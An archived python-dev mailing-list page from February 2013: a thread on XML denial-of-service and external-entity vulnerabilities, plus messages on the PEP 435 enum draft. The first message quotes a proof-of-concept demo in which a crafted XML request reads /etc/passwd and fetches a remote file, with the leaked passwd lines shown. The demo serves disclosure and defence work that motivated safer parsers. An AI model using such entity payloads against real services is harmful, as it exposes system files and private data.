date:20130224

Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python

2013-02-24 Thread M.-A. Lemburg

Reminds me of the encoding attacks that were possible in earlier
versions of Python... you could have e.g. an email processing
script run the Python test suite by simply sending a specially
crafted email :-)

On 21.02.2013 13:04, Christian Heimes wrote:
> Am 21.02.2013 11:32, schrieb Antoine Pitrou:
>> You haven't proved that these were actual threats, nor how they
>> actually worked. I'm gonna remain skeptical if there isn't anything
>> more precise than "It highly depends on the parser and the application
>> what kind of exploit is possible".
> 
> https://bitbucket.org/tiran/defusedxml/src/82f4037464418bf11ea734969b7ca1c193e6ed91/other/python-external.py?at=default
> 
> $ ./python-external.py
> 
> REQUEST:
> 
> Aachen
> 
> RESPONSE:
> -
> The weather in Aachen is terrible. 
> 
> REQUEST:
> 
> 
>  
> ]>
> &passwd;
> 
> 
> RESPONSE:
> -
> Unknown city root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bi
> 
> 
> REQUEST:
> 
> 
>   "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem";>
> ]>
> &url;
> 
> 
> RESPONSE:
> -
> Unknown city -BEGIN DH PARAMETERS-
> MEYCQQD1Kv884bEpQBgRjXyEpwpy1obEAxnIByl6ypUM2Zafq9AKUJsCRtMIPWak
> XUGfnHy9iUsiGSa6q6Jew1XpKgVfAgEC
> -END DH PARAMETERS-
> 
> These are the 512 bit DH parameters from "Assigned Number for SKIP
> Protocols"
> (http://www.skip-vpn.org/spec/numbers.html).
> See there for how they were generated.
> Note that g is not a generator, but this is not a problem since p is a
> safe prime.
> 
> 
> 
> Q.E.D.
> Christian
> ___
> Python-Dev mailing list
> [email protected]
> http://mail.python.org/mailman/listinfo/python-dev
> Unsubscribe: 
> http://mail.python.org/mailman/options/python-dev/mal%40egenix.com
> 

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Services directly from the Source  (#1, Feb 24 2013)
>>> Python Projects, Consulting and Support ...   http://www.egenix.com/
>>> mxODBC.Zope/Plone.Database.Adapter ...   http://zope.egenix.com/
>>> mxODBC, mxDateTime, mxTextTools ...http://python.egenix.com/


: Try our mxODBC.Connect Python Database Interface for free ! ::

   eGenix.com Software, Skills and Services GmbH  Pastor-Loeh-Str.48
D-40764 Langenfeld, Germany. CEO Dipl.-Math. Marc-Andre Lemburg
   Registered at Amtsgericht Duesseldorf: HRB 46611
   http://www.egenix.com/company/contact/
___
Python-Dev mailing list
[email protected]
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com

Re: [Python-Dev] [Python-checkins] peps: Pre-alpha draft for PEP 435 (enum). The name is not important at the moment, as

2013-02-24 Thread Barry Warsaw

On Feb 23, 2013, at 04:02 PM, Stefan Krah wrote:

>> +Ordered comparisons between enumeration values are *not* supported.  Enums
>> are +not integers!
>
>Hmm. I think this limits interoperation with C libraries and prototyping
>C code.

This is mostly a red-herring.  flufl.enum values are C-level int compatible
without actually *being* ints.

E.g.

static PyObject *
intcompat_printint(PyObject *self, PyObject *args)
{
int value;
if (!PyArg_ParseTuple(args, "i", &value))
return NULL;

printf("and the value is: %d\n", value);
Py_RETURN_NONE;
}

>>> from _intcompat import *
>>> printint(7)
and the value is: 7
>>> from flufl.enum import make
>>> Colors = make('Colors', 'red green blue'.split())
>>> printint(Colors.green)
and the value is: 2

Full module code is here:

http://bazaar.launchpad.net/~barry/+junk/intcompat/files

Cheers,
-Barry


signature.asc
Description: PGP signature
___
Python-Dev mailing list
[email protected]
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com

Re: [Python-Dev] [Python-checkins] peps: Pre-alpha draft for PEP 435 (enum). The name is not important at the moment, as

2013-02-24 Thread Ethan Furman


On 02/24/2013 05:40 PM, Barry Warsaw wrote:

On Feb 23, 2013, at 04:02 PM, Stefan Krah wrote:


+Ordered comparisons between enumeration values are *not* supported.  Enums
are +not integers!


Hmm. I think this limits interoperation with C libraries and prototyping
C code.


This is mostly a red-herring.  flufl.enum values are C-level int compatible
without actually *being* ints.

E.g.

static PyObject *
intcompat_printint(PyObject *self, PyObject *args)
{
 int value;
 if (!PyArg_ParseTuple(args, "i", &value))
 return NULL;

 printf("and the value is: %d\n", value);
 Py_RETURN_NONE;
}


from _intcompat import *
printint(7)

and the value is: 7

from flufl.enum import make
Colors = make('Colors', 'red green blue'.split())
printint(Colors.green)

and the value is: 2


Okay, that's pretty cool.

I would still like the int subclass, though, as it would be an aid to me on the 
Python side.

--
~Ethan~
___
Python-Dev mailing list
[email protected]
http://mail.python.org/mailman/listinfo/python-dev
Unsubscribe: 
http://mail.python.org/mailman/options/python-dev/archive%40mail-archive.com

Re: [Python-Dev] XML DoS vulnerabilities and exploits in Python

Re: [Python-Dev] [Python-checkins] peps: Pre-alpha draft for PEP 435 (enum). The name is not important at the moment, as

Re: [Python-Dev] [Python-checkins] peps: Pre-alpha draft for PEP 435 (enum). The name is not important at the moment, as

3 matches

Site Navigation

Mail list logo

Footer information